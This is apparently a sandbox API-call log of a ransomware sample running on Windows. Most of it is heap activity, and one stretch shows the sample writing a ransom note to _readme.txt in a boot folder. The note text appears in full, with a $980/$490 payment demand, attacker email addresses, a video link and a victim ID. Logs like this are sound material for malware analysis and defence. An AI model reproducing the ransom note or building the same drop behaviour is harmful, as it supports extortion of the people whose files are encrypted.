[0175.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.357] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.367] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0175.367] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.368] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.368] PathFindFileNameW (pszPath="") returned="" [0175.368] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.368] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.369] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.369] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0175.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.369] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0175.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.369] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0175.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.371] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.371] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0175.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0175.371] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0175.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0175.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.372] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*" (normalized: "c:\\boot\\zh-hk\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.373] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.373] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0175.373] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0175.373] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0175.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0175.374] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 